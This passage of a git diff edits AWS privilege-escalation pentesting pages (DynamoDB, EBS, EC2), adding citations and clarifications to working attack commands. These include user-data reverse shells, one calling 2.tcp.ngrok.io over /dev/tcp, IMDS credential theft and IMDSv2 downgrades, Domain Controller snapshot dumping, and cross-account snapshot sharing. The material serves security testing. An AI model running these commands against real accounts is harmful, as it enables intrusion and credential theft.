+If you need to customize it, here is a list of all possible DynamoDB actions: [AWS Documentation](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Operations.html). And here is a list of all actions that can be allowed via a resource based policy *AND which of these can be used cross-account (think data exfiltration!)*: [AWS Documentation](https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/rbac-iam-actions.html)<sup>[[7]](#references)[[8]](#references)</sup>
 
-Now, with the policy document `policy.json` ready, put the resource policy:
+Now, with the policy document `policy.json` ready, put the resource policy. The AWS CLI accepts a `file://` URL when loading a parameter from a file:<sup>[[6]](#references)[[10]](#references)[[11]](#references)</sup>
 
 ```bash
 # put the new policy using the prepared policy file
-# dynamodb does weirdly not allow a direct file upload
 aws dynamodb put-resource-policy \
 	--resource-arn <table_arn> \
-	--policy "$(cat policy.json)"
+	--policy file://policy.json
 ```
 
-Now, you should have the permissions you needed.
+After the policy is accepted, the specified principal has the permissions allowed by that resource policy, subject to normal IAM policy evaluation.<sup>[[3]](#references)[[4]](#references)</sup>
 
 ### Post Exploitation
 
@@ -75,7 +74,19 @@ As far as I know there is **no other direct way to escalate privileges in AWS ju
 
 ### TODO: Read data abusing data Streams
 
+## References
+
+- [1] [Amazon DynamoDB now supports resource-based policies](https://aws.amazon.com/about-aws/whats-new/2024/03/amazon-dynamodb-resource-based-policies/)
+- [2] [Using resource-based policies for DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/access-control-resource-based.html)
+- [3] [Authorization with IAM identity-based policies and DynamoDB resource-based policies](https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/rbac-auth-iam-id-based-policies-DDB.html)
+- [4] [DynamoDB resource-based policy examples](https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/rbac-examples.html)
+- [5] [GetResourcePolicy - Amazon DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_GetResourcePolicy.html)
+- [6] [PutResourcePolicy - Amazon DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_PutResourcePolicy.html)
+- [7] [Actions - Amazon DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Operations.html)
+- [8] [DynamoDB API operations supported by resource-based policies - Amazon DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/rbac-iam-actions.html)
+- [9] [get-resource-policy - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/dynamodb/get-resource-policy.html)
+- [10] [put-resource-policy - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/dynamodb/put-resource-policy.html)
+- [11] [Loading a parameter from a file in the AWS CLI - AWS Command Line Interface](https://docs.aws.amazon.com/cli/latest/userguide/cli-usage-parameters-file.html)
+
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
 

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc/README.md
@@ -1,30 +1,38 @@
 # AWS - EBS Privesc
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## EBS
 
 ### `ebs:ListSnapshotBlocks`, `ebs:GetSnapshotBlock`, `ec2:DescribeSnapshots`
 
-An attacker with those will be able to potentially **download and analyze volumes snapshots locally** and search for sensitive information in them (like secrets or source code). Find how to do this in:
+A principal with these permissions can enumerate EBS snapshots available to it and read their block data (subject to snapshot access and any required KMS permissions), then reconstruct and analyze a volume locally; snapshot contents may expose secrets or source code.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup>
+
+Find how to do this in:
 
 {{#ref}}
 ../../aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md
 {{#endref}}
 
-Other permissions might be also useful such as: `ec2:DescribeInstances`, `ec2:DescribeVolumes`, `ec2:DeleteSnapshot`, `ec2:CreateSnapshot`, `ec2:CreateTags`
+Other permissions might also be useful, such as `ec2:DescribeInstances`, `ec2:DescribeVolumes`, `ec2:DeleteSnapshot`, `ec2:CreateSnapshot`, and `ec2:CreateTags`.<sup>[[4]](#references)</sup>
 
-The tool [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) performs this attack to e**xtract passwords from a domain controller**.
+The tool [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) performs this attack to **extract passwords from a domain controller**.<sup>[[7]](#references)</sup>
 
-**Potential Impact:** Indirect privesc by locating sensitive information in the snapshot (you could even get Active Directory passwords).
+**Potential Impact:** Indirect privesc by locating sensitive information in the snapshot (you could even recover Active Directory password hashes).<sup>[[7]](#references)[[8]](#references)</sup>
 
 ### **`ec2:CreateSnapshot`**
 
-Any AWS user possessing the **`EC2:CreateSnapshot`** permission can steal the hashes of all domain users by creating a **snapshot of the Domain Controller** mounting it to an instance they control and **exporting the NTDS.dit and SYSTEM** registry hive file for use with Impacket's secretsdump project.
+The [CloudCopy](https://github.com/Static-Flow/CloudCopy) project documents a cloud Shadow Copy path that starts by creating a snapshot of a Domain Controller volume, mounting it to an instance under the operator's control, and exporting `NTDS.dit` plus the `SYSTEM` registry hive for offline processing with Impacket's `secretsdump`.<sup>[[5]](#references)[[7]](#references)[[8]](#references)</sup> The repository's documented workflow also shares the snapshot and launches an analysis instance, so `ec2:CreateSnapshot` is a critical prerequisite rather than a complete standalone policy; encrypted snapshots have additional sharing and KMS-key constraints.<sup>[[4]](#references)[[6]](#references)[[7]](#references)</sup>
 
-You can use this tool to automate the attack: [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) or you could use one of the previous techniques after creating a snapshot.
+You can use this tool to automate the attack: [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) or you could use one of the previous techniques after creating a snapshot.<sup>[[7]](#references)</sup>
+
+## References
+
+- [1] [Actions, resources, and condition keys for Amazon Elastic Block Store](https://docs.aws.amazon.com/service-authorization/latest/reference/list_ebs.html)
+- [2] [GetSnapshotBlock - EBS direct APIs](https://docs.aws.amazon.com/ebs/latest/APIReference/API_GetSnapshotBlock.html)
+- [3] [DescribeSnapshots - Amazon Elastic Compute Cloud](https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeSnapshots.html)
+- [4] [Actions, resources, and condition keys for Amazon EC2](https://docs.aws.amazon.com/service-authorization/latest/reference/list_ec2.html)
+- [5] [CreateSnapshot - Amazon Elastic Compute Cloud](https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_CreateSnapshot.html)
+- [6] [Share an Amazon EBS snapshot with other AWS accounts](https://docs.aws.amazon.com/ebs/latest/userguide/ebs-modifying-snapshot-permissions.html)
+- [7] [CloudCopy](https://github.com/Static-Flow/CloudCopy)
+- [8] [secretsdump.py](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc/README.md
@@ -1,7 +1,5 @@
 # AWS - EC2 Privesc
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## EC2
 
 For more **info about EC2** check:
@@ -12,11 +10,11 @@ For more **info about EC2** check:
 
 ### `iam:PassRole`, `ec2:RunInstances`
 
-An attacker could **create and instance attaching an IAM role and then access the instance** to steal the IAM role credentials from the metadata endpoint.
+An attacker could **create an instance, attach an IAM role, and then access the instance** to steal the role's temporary credentials from the instance metadata endpoint. The permissions required to launch an instance with a role include `ec2:RunInstances` and `iam:PassRole`.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup>
 
 - **Access via SSH**
 
-Run a new instance using a **created** **ssh key** (`--key-name`) and then ssh into it (if you want to create a new one you might need to have the permission `ec2:CreateKeyPair`).
+Run a new instance using a **created** **SSH key** (`--key-name`) and then SSH into it. If you want to create a new key pair, you might need the `ec2:CreateKeyPair` permission.<sup>[[4]](#references)[[26]](#references)</sup>
 
 ```bash
 aws ec2 run-instances --image-id <img-id> --instance-type t2.micro \
@@ -26,7 +24,7 @@ aws ec2 run-instances --image-id <img-id> --instance-type t2.micro \
 
 - **Access via rev shell in user data**
 
-You can run a new instance using a **user data** (`--user-data`) that will send you a **rev shell**. You don't need to specify security group this way.
+You can run a new instance using **user data** (`--user-data`) that will send you a **reverse shell**. The example omits `--security-group-ids`; in a default VPC, EC2 then uses the VPC's default security group, so user data does not bypass security-group controls.<sup>[[4]](#references)[[11]](#references)</sup>
 
 ```bash
 echo '#!/bin/bash
@@ -38,17 +36,17 @@ aws ec2 run-instances --image-id <img-id> --instance-type t2.micro \
    --user-data "file:///tmp/rev.sh"
 ```
 
-Be careful with GuradDuty if you use the credentials of the IAM role outside of the instance:
+Be careful with GuardDuty if you use the credentials of the IAM role outside of the instance; GuardDuty can generate an instance-credential-exfiltration finding for this behavior.<sup>[[5]](#references)</sup>
 
 {{#ref}}
 ../../aws-services/aws-security-and-detection-services/aws-guardduty-enum.md
 {{#endref}}
 
-**Potential Impact:** Direct privesc to a any EC2 role attached to existing instance profiles.
+**Potential Impact:** Direct privilege escalation to any EC2 role attached to an existing instance profile.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup>
 
 #### Privesc to ECS
 
-With this set of permissions you could also **create an EC2 instance and register it inside an ECS cluster**. This way, ECS **services** will be **run** in inside the **EC2 instance** where you have access and then you can penetrate those services (docker containers) and **steal their ECS roles attached**.
+With this set of permissions you could also **create an EC2 instance and register it inside an ECS cluster**. ECS services can then place tasks on the instance, where access to the host and its containers may expose task-role credentials. ECS container instances require an agent and an instance role, while task roles vend permissions to containers; on EC2, containers are not a security boundary for other co-located tasks.<sup>[[6]](#references)[[7]](#references)</sup>
 
 ```bash
 aws ec2 run-instances \
@@ -71,14 +69,13 @@ To learn how to **force ECS services to be run** in this new EC2 instance check:
 ../aws-ecs-privesc/README.md
 {{#endref}}
 
-If you **cannot create a new instance** but has the permission `ecs:RegisterContainerInstance` you might be able to register the instance inside the cluster and perform the commented attack.
+If you **cannot create a new instance** but have the permission `ecs:RegisterContainerInstance`, you might be able to register an ECS-capable existing instance inside the cluster and perform the commented attack.<sup>[[6]](#references)[[29]](#references)</sup>
 
-**Potential Impact:** Direct privesc to ECS roles attached to tasks.
+**Potential Impact:** Direct privilege escalation to ECS task roles attached to tasks running on the compromised container instance.<sup>[[7]](#references)</sup>
 
 ### **`iam:PassRole`,** **`iam:AddRoleToInstanceProfile`**
 
-Similar to the previous scenario, an attacker with these permissions could **change the IAM role of a compromised instance** so he could steal new credentials.\
-As an instance profile can only have 1 role, if the instance profile **already has a role** (common case), you will also need **`iam:RemoveRoleFromInstanceProfile`**.
+Similar to the previous scenario, an attacker with these permissions could **change the IAM role of a compromised instance** and steal new credentials. An instance profile can contain only one IAM role; if it **already has a role** (the common case), you will also need **`iam:RemoveRoleFromInstanceProfile`** to replace it. The `AddRoleToInstanceProfile` API also requires `iam:PassRole` on the role.<sup>[[2]](#references)[[8]](#references)[[30]](#references)</sup>
 
 ```bash
 # Removing role from instance profile
@@ -88,19 +85,19 @@ aws iam remove-role-from-instance-profile --instance-profile-name <name> --role-
 aws iam add-role-to-instance-profile --instance-profile-name <name> --role-name <name>
 ```
 
-If the **instance profile has a role** and the attacker **cannot remove it**, there is another workaround. He could **find** an **instance profile without a role** or **create a new one** (`iam:CreateInstanceProfile`), **add** the **role** to that **instance profile** (as previously discussed), and **associate the instance profile** compromised to a compromised i**nstance:**
+If the **instance profile has a role** and the attacker **cannot remove it**, there is another workaround. They could **find** an **instance profile without a role** or **create a new one** (`iam:CreateInstanceProfile`), **add** the target **role** to that **instance profile**, and **associate the instance profile** with the compromised **instance**.<sup>[[2]](#references)[[8]](#references)[[9]](#references)</sup>
 
-- If the instance **doesn't have any instance** profile (`ec2:AssociateIamInstanceProfile`)
+- If the instance **doesn't have an instance** profile (`ec2:AssociateIamInstanceProfile`):
 
 ```bash
 aws ec2 associate-iam-instance-profile --iam-instance-profile Name=<value> --instance-id <value>
 ```
 
-**Potential Impact:** Direct privesc to a different EC2 role (you need to have compromised a AWS EC2 instance and some extra permission or specific instance profile status).
+**Potential Impact:** Direct privilege escalation to a different EC2 role (you need to have compromised an AWS EC2 instance and have the required permission or instance-profile state).<sup>[[3]](#references)[[8]](#references)[[9]](#references)</sup>
 
-### **`iam:PassRole`((** `ec2:AssociateIamInstanceProfile`& `ec2:DisassociateIamInstanceProfile`) || `ec2:ReplaceIamInstanceProfileAssociation`)
+### `iam:PassRole` with (`ec2:AssociateIamInstanceProfile` and `ec2:DisassociateIamInstanceProfile`) or `ec2:ReplaceIamInstanceProfileAssociation`
 
-With these permissions it's possible to change the instance profile associated to an instance so if the attack had already access to an instance he will be able to steal credentials for more instance profile roles changing the one associated with it.
+With these permissions, an attacker who already has access to an instance can change its associated instance profile and steal credentials for another role. AWS documents `iam:PassRole` together with the association, disassociation, and replacement actions for this workflow.<sup>[[2]](#references)[[9]](#references)</sup>
 
 - If it **has an instance profile**, you can **remove** the instance profile (`ec2:DisassociateIamInstanceProfile`) and **associate** it
 
@@ -116,12 +113,11 @@ aws ec2 associate-iam-instance-profile --iam-instance-profile Name=<value> --ins
 aws ec2 replace-iam-instance-profile-association --iam-instance-profile Name=<value> --association-id <value>
 ```
 
-**Potential Impact:** Direct privesc to a different EC2 role (you need to have compromised a AWS EC2 instance and some extra permission or specific instance profile status).
+**Potential Impact:** Direct privilege escalation to a different EC2 role (you need to have compromised an AWS EC2 instance and have the required permission or instance-profile state).<sup>[[3]](#references)[[9]](#references)</sup>
 
-### `ec2:RequestSpotInstances`,`iam:PassRole`
+### `ec2:RequestSpotInstances`, `iam:PassRole`
 
-An attacker with the permissions **`ec2:RequestSpotInstances`and`iam:PassRole`** can **request** a **Spot Instance** with an **EC2 Role attached** and a **rev shell** in the **user data**.\
-Once the instance is run, he can **steal the IAM role**.
+An attacker with the permissions **`ec2:RequestSpotInstances` and `iam:PassRole`** can **request** a **Spot Instance** with an **EC2 role attached** and a **reverse shell** in the **user data**. Once the instance runs, they can **steal the role's temporary credentials**. Spot launch specifications support both `IamInstanceProfile` and `UserData`.<sup>[[2]](#references)[[3]](#references)[[10]](#references)</sup>
 
 ```bash
 REV=$(printf '#!/bin/bash
@@ -135,9 +131,9 @@ aws ec2 request-spot-instances \
 
 ### `ec2:ModifyInstanceAttribute`
 
-An attacker with the **`ec2:ModifyInstanceAttribute`** can modify the instances attributes. Among them, he can **change the user data**, which implies that he can make the instance **run arbitrary data.** Which can be used to get a **rev shell to the EC2 instance**.
+An attacker with **`ec2:ModifyInstanceAttribute`** can modify instance attributes, including **user data**. User-data scripts normally run only on the first boot, so replacing the value alone does not guarantee execution after a restart; the example explicitly changes cloud-init's `scripts-user` frequency to `always` before adding the reverse shell.<sup>[[11]](#references)[[12]](#references)</sup>
 
-Note that the attributes can only be **modified while the instance is stopped**, so the **permissions** **`ec2:StopInstances`** and **`ec2:StartInstances`**.
+User data must be modified while the instance is stopped, so the attacker also needs **`ec2:StopInstances`** and **`ec2:StartInstances`** (and an EBS-backed instance suitable for stopping).<sup>[[11]](#references)[[12]](#references)</sup>
 
 ```bash
 TEXT='Content-Type: multipart/mixed; boundary="//"
@@ -164,7 +160,7 @@ bash -i >& /dev/tcp/2.tcp.ngrok.io/14510 0>&1
 --//'
 TEXT_PATH="/tmp/text.b64.txt"
 
-printf $TEXT | base64 > "$TEXT_PATH"
+printf '%s' "$TEXT" | base64 > "$TEXT_PATH"
 
 aws ec2 stop-instances --instance-ids $INSTANCE_ID
 
@@ -176,11 +172,11 @@ aws ec2 modify-instance-attribute \
 aws ec2 start-instances --instance-ids $INSTANCE_ID
 ```
 
-**Potential Impact:** Direct privesc to any EC2 IAM Role attached to a created instance.
+**Potential Impact:** Direct privilege escalation to the EC2 IAM role attached to the modified instance.<sup>[[3]](#references)[[11]](#references)</sup>
 
-### `ec2:CreateLaunchTemplateVersion`,`ec2:CreateLaunchTemplate`,`ec2:ModifyLaunchTemplate`
+### `ec2:CreateLaunchTemplateVersion`, `ec2:CreateLaunchTemplate`, `ec2:ModifyLaunchTemplate`
 
-An attacker with the permissions **`ec2:CreateLaunchTemplateVersion`,`ec2:CreateLaunchTemplate`and `ec2:ModifyLaunchTemplate`** can create a **new Launch Template version** with a **rev shell in** the **user data** and **any EC2 IAM Role on it**, change the default version, and **any Autoscaler group** **using** that **Launch Templat**e that is **configured** to use the **latest** or the **default version** will **re-run the instances** using that template and will execute the rev shell.
+An attacker with the permissions **`ec2:CreateLaunchTemplateVersion`, `ec2:CreateLaunchTemplate`, and `ec2:ModifyLaunchTemplate`** can create a **new launch template version** with a **reverse shell in** the **user data** and an **EC2 IAM role**, then change the default version. An Auto Scaling group configured to use the **latest** or **default** version can subsequently launch instances from that modified template.<sup>[[13]](#references)[[14]](#references)[[27]](#references)</sup>
 
 ```bash
 REV=$(printf '#!/bin/bash
@@ -196,11 +192,11 @@ aws ec2 modify-launch-template \
    --default-version 2
 ```
 
-**Potential Impact:** Direct privesc to a different EC2 role.
+**Potential Impact:** Direct privilege escalation to a different EC2 role.<sup>[[3]](#references)[[13]](#references)[[14]](#references)</sup>
 
 ### (`autoscaling:CreateLaunchConfiguration` | `ec2:CreateLaunchTemplate`),  `iam:PassRole`, (`autoscaling:CreateAutoScalingGroup` | `autoscaling:UpdateAutoScalingGroup`)
 
-An attacker with the permissions **`autoscaling:CreateLaunchConfiguration`,`autoscaling:CreateAutoScalingGroup`,`iam:PassRole`** can **create a Launch Configuration** with an **IAM Role** and a **rev shell** inside the **user data**, then **create an autoscaling group** from that config and wait for the rev shell to **steal the IAM Role**.
+An attacker with the permissions **`autoscaling:CreateLaunchConfiguration`, `autoscaling:CreateAutoScalingGroup`, and `iam:PassRole`** can **create a launch configuration** with an **IAM role** and a **reverse shell** inside the **user data**, then **create an Auto Scaling group** from that configuration and wait for the reverse shell to **steal the role's temporary credentials**. Launch configurations support both an instance profile and user data, and an Auto Scaling group can use a launch configuration to launch instances.<sup>[[2]](#references)[[3]](#references)[[15]](#references)[[16]](#references)</sup>
 
 ```bash
 aws --profile "$NON_PRIV_PROFILE_USER" autoscaling create-launch-configuration \
@@ -218,15 +214,15 @@ aws --profile "$NON_PRIV_PROFILE_USER" autoscaling create-auto-scaling-group \
    --vpc-zone-identifier "subnet-e282f9b8"
 ```
 
-**Potential Impact:** Direct privesc to a different EC2 role.
+**Potential Impact:** Direct privilege escalation to a different EC2 role.<sup>[[3]](#references)[[15]](#references)[[16]](#references)</sup>
 
-### `!autoscaling`
+### Launch-template and Auto Scaling constraints
 
-The set of permissions **`ec2:CreateLaunchTemplate`** and **`autoscaling:CreateAutoScalingGroup`** **aren't enough to escalate** privileges to an IAM role because in order to attach the role specified in the Launch Configuration or in the Launch Template **you need to permissions `iam:PassRole`and `ec2:RunInstances`** (which is a known privesc).
+The set of permissions **`ec2:CreateLaunchTemplate`** and **`autoscaling:CreateAutoScalingGroup`** **is not by itself enough to escalate** to an IAM role. When creating or updating a group, Auto Scaling validates the launch template's `ec2:RunInstances` and `iam:PassRole` requirements; both permissions are needed when the selected template passes an instance role. For `$Latest` or `$Default` versions, later launches use the service-linked role, so version-management permissions should also be restricted.<sup>[[2]](#references)[[14]](#references)</sup>
 
 ### `ec2-instance-connect:SendSSHPublicKey`
 
-An attacker with the permission **`ec2-instance-connect:SendSSHPublicKey`** can add an ssh key to a user and use it to access it (if he has ssh access to the instance) or to escalate privileges.
+An attacker with **`ec2-instance-connect:SendSSHPublicKey`** can push a temporary SSH public key for a specified OS user and use it to access the instance if they also have network access, potentially reaching the instance profile credentials.<sup>[[3]](#references)[[17]](#references)</sup>
 
 ```bash
 aws ec2-instance-connect send-ssh-public-key \
@@ -235,13 +231,13 @@ aws ec2-instance-connect send-ssh-public-key \
    --ssh-public-key "file://$PUBK_PATH"
 ```
 
-**Potential Impact:** Direct privesc to the EC2 IAM roles attached to running instances.
+**Potential Impact:** Direct privilege escalation to the EC2 IAM roles attached to running instances.<sup>[[3]](#references)[[17]](#references)</sup>
 
 ### `ec2-instance-connect:SendSerialConsoleSSHPublicKey`
 
-An attacker with the permission **`ec2-instance-connect:SendSerialConsoleSSHPublicKey`** can **add an ssh key to a serial connection**. If the serial is not enable, the attacker needs the permission **`ec2:EnableSerialConsoleAccess` to enable it**.
+An attacker with **`ec2-instance-connect:SendSerialConsoleSSHPublicKey`** can **push an SSH key to a serial connection**. If serial-console access is not enabled for the account, the attacker needs **`ec2:EnableSerialConsoleAccess`** to enable it.<sup>[[18]](#references)[[19]](#references)</sup>
 
-In order to connect to the serial port you also **need to know the username and password of a user** inside the machine.
+For Linux interactive troubleshooting, the instance must have a password-based OS user, so the attacker also needs that user's username and password.<sup>[[18]](#references)</sup>
 
 ```bash
 aws ec2 enable-serial-console-access
@@ -255,13 +251,13 @@ aws ec2-instance-connect send-serial-console-ssh-public-key \
 ssh -i /tmp/priv $INSTANCE_ID.port0@serial-console.ec2-instance-connect.eu-west-1.aws
 ```
 
-This way isn't that useful to privesc as you need to know a username and password to exploit it.
+This way is less useful for privilege escalation because it requires a password-based OS user and account-level serial-console access.
 
-**Potential Impact:** (Highly unprovable) Direct privesc to the EC2 IAM roles attached to running instances.
+**Potential Impact:** If serial-console access and OS authentication are available, access to the instance can expose the EC2 IAM role attached to it.<sup>[[3]](#references)[[18]](#references)</sup>
 
-### `describe-launch-templates`,`describe-launch-template-versions`
+### `ec2:DescribeLaunchTemplates`, `ec2:DescribeLaunchTemplateVersions`
 
-Since launch templates have versioning, an attacker with **`ec2:describe-launch-templates`** and **`ec2:describe-launch-template-versions`** permissions could exploit these to discover sensitive information, such as credentials present in user data. To accomplish this, the following script loops through all versions of the available launch templates:
+Since launch templates have versioning, an attacker with **`ec2:DescribeLaunchTemplates`** and **`ec2:DescribeLaunchTemplateVersions`** permissions could discover sensitive information, such as credentials present in user data. The first API enumerates templates and the second returns version data, including `UserData`; the script below loops through all available templates and versions.<sup>[[11]](#references)[[20]](#references)[[21]](#references)</sup>
 
 ```bash
 for i in $(aws ec2 describe-launch-templates --region us-east-1 | jq -r '.LaunchTemplates[].LaunchTemplateId')
@@ -278,25 +274,16 @@ done
 
 In the above commands, although we're specifying certain patterns (`aws_|password|token|api`), you can use a different regex to search for other types of sensitive information.
 
-Assuming we find `aws_access_key_id` and `aws_secret_access_key`, we can use these credentials to authenticate to AWS.
+Assuming we find valid `aws_access_key_id` and `aws_secret_access_key` values, we can use them as AWS credentials to authenticate to AWS.
 
-**Potential Impact:** Direct privilege escalation to IAM user(s).
-
-## References
-
-- [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)
-
-
-
-
-
+**Potential Impact:** Direct privilege escalation to IAM user(s) if the discovered keys belong to a more privileged principal.
 
 ### `ec2:ModifyInstanceMetadataOptions` (IMDS downgrade to enable SSRF credential theft)
 
-An attacker with the ability to call `ec2:ModifyInstanceMetadataOptions` on a victim EC2 instance can weaken IMDS protections by enabling IMDSv1 (`HttpTokens=optional`) and increasing the `HttpPutResponseHopLimit`. This makes the instance metadata endpoint reachable via common SSRF/proxy paths from applications running on the instance. If the attacker can trigger a SSRF in such an app, they can retrieve the instance profile credentials and pivot with them.
+An attacker with the ability to call `ec2:ModifyInstanceMetadataOptions` on a victim EC2 instance can weaken IMDS protections by enabling IMDSv1 (`HttpTokens=optional`) and increasing the `HttpPutResponseHopLimit`. IMDSv2 is designed to add defenses against SSRF and proxy paths, while the hop limit controls how far the IMDSv2 token response can travel. If the attacker can trigger an SSRF in an application that can reach IMDS, they can retrieve the instance profile credentials and pivot with them. Account-level or organization policies may prevent changing these settings.<sup>[[3]](#references)[[22]](#references)[[23]](#references)[[28]](#references)</sup>
 
-- Required permissions: `ec2:ModifyInstanceMetadataOptions` on the target instance (plus the ability to reach/trigger a SSRF on the host).
-- Target resource: The running EC2 instance with an attached instance profile (IAM role).
+- Required permissions: `ec2:ModifyInstanceMetadataOptions` on the target instance (plus the ability to reach/trigger an SSRF on the host).<sup>[[22]](#references)[[28]](#references)</sup>
+- Target resource: The running EC2 instance with an attached instance profile (IAM role).<sup>[[3]](#references)[[22]](#references)</sup>
 
 Commands example:
 
@@ -324,26 +311,16 @@ aws sts get-caller-identity
 
 # 6) Restore protections (require IMDSv2, low hop limit)
 aws ec2 modify-instance-metadata-options --instance-id <INSTANCE_ID> \
-  --http-tokens required --http-put-response-hop-limit 1
+  --http-endpoint enabled --http-tokens required --http-put-response-hop-limit 1
 ```
 
-Potential Impact: Theft of instance profile credentials via SSRF leading to privilege escalation and lateral movement with the EC2 role permissions.
+Potential Impact: Theft of instance profile credentials via SSRF leading to privilege escalation and lateral movement with the EC2 role permissions.<sup>[[3]](#references)[[22]](#references)[[23]](#references)[[28]](#references)</sup>
 
-### `ec2:ModifyInstanceMetadataOptions`
-
-An attacker with the ec2:ModifyInstanceMetadataOptions permission can weaken Instance Metadata Service (IMDS) protections — for example by forcing IMDSv1 (making HttpTokens not required) or increasing HttpPutResponseHopLimit — thereby easing exfiltration of temporary credentials. The most relevant risk vector is raising HttpPutResponseHopLimit: by increasing that hop limit (TTL), the 169.254.169.254 endpoint stops being strictly limited to the VM’s network namespace and can become reachable by other processes/containers, enabling credential theft.
-
-```bash
-aws ec2 modify-instance-metadata-options \
-  --instance-id <INSTANCE_ID> \
-  --http-tokens optional \
-  --http-endpoint enabled \
-  --http-put-response-hop-limit 2
-```
+Raising the hop limit can allow IMDSv2 responses to traverse an additional container or network hop; the exact reachability depends on the instance's network path. Requiring `HttpTokens=required` restores the IMDSv2 requirement, although account-level enforcement can prevent the downgrade in the first place.<sup>[[22]](#references)[[23]](#references)[[28]](#references)</sup>
 
 ### `ec2:ModifyImageAttribute`, `ec2:ModifySnapshotAttribute`
 
-An attacker with the ec2:ModifyImageAttribute and ec2:ModifySnapshotAttribute permissions can share AMIs or snapshots with other AWS accounts (or even make them public), exposing images or volumes that may contain sensitive data such as configurations, credentials, certificates, or backups. By modifying an AMI’s launch permissions or a snapshot’s create-volume permissions, the attacker allows third parties to launch instances or mount disks from those resources and access their contents.
+An attacker with the `ec2:ModifyImageAttribute` and `ec2:ModifySnapshotAttribute` permissions can share AMIs or snapshots with other AWS accounts (or make them public where account and resource restrictions allow), exposing images or volumes that may contain sensitive data such as configurations, credentials, certificates, or backups. By modifying an AMI's launch permissions or a snapshot's create-volume permissions, the attacker allows third parties to launch instances or create volumes from those resources and access their contents.<sup>[[24]](#references)[[25]](#references)</sup>
 
 To share an AMI with another account:
 
@@ -356,5 +333,40 @@ To share an EBS snapshot with another account:
 ```bash
 aws ec2 modify-snapshot-attribute --snapshot-id <snapshot_ID> --create-volume-permission "Add=[{UserId=<recipient_account_ID>}]" --region <AWS_region>
 ```
+
+**Potential Impact:** Disclosure of data stored in shared AMIs or snapshots, potentially including credentials that enable further privilege escalation.<sup>[[24]](#references)[[25]](#references)</sup>
+
+## References
+
+- [1] [AWS IAM Privilege Escalation – Methods and Mitigation](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)
+- [2] [Grant a user permissions to pass a role to an AWS service](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_passrole.html)
+- [3] [IAM roles for Amazon EC2](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/iam-roles-for-amazon-ec2.html)
+- [4] [run-instances — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ec2/run-instances.html)
+- [5] [GuardDuty IAM finding types](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html)
+- [6] [Amazon ECS container instance IAM role](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/instance_IAM_role.html)
+- [7] [Amazon ECS task IAM role](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-iam-roles.html)
+- [8] [Use instance profiles](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_switch-role-ec2_instance-profiles.html)
+- [9] [Grant permissions to attach an IAM role to an instance](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/permission-to-pass-iam-roles.html)
+- [10] [request-spot-instances — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ec2/request-spot-instances.html)
+- [11] [Run commands when you launch an EC2 instance with user data input](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/user-data.html)
+- [12] [modify-instance-attribute — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ec2/modify-instance-attribute.html)
+- [13] [Modify a launch template (manage launch template versions)](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/manage-launch-template-versions.html)
+- [14] [Control Amazon EC2 launch template usage in Auto Scaling groups](https://docs.aws.amazon.com/autoscaling/ec2/userguide/ec2-auto-scaling-launch-template-permissions.html)
+- [15] [create-launch-configuration — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/autoscaling/create-launch-configuration.html)
+- [16] [create-auto-scaling-group — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/autoscaling/create-auto-scaling-group.html)
+- [17] [Connect to a Linux instance using EC2 Instance Connect](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-connect-methods.html)
+- [18] [Configure access to the EC2 Serial Console](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/configure-access-to-serial-console.html)
+- [19] [send-serial-console-ssh-public-key — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ec2-instance-connect/send-serial-console-ssh-public-key.html)
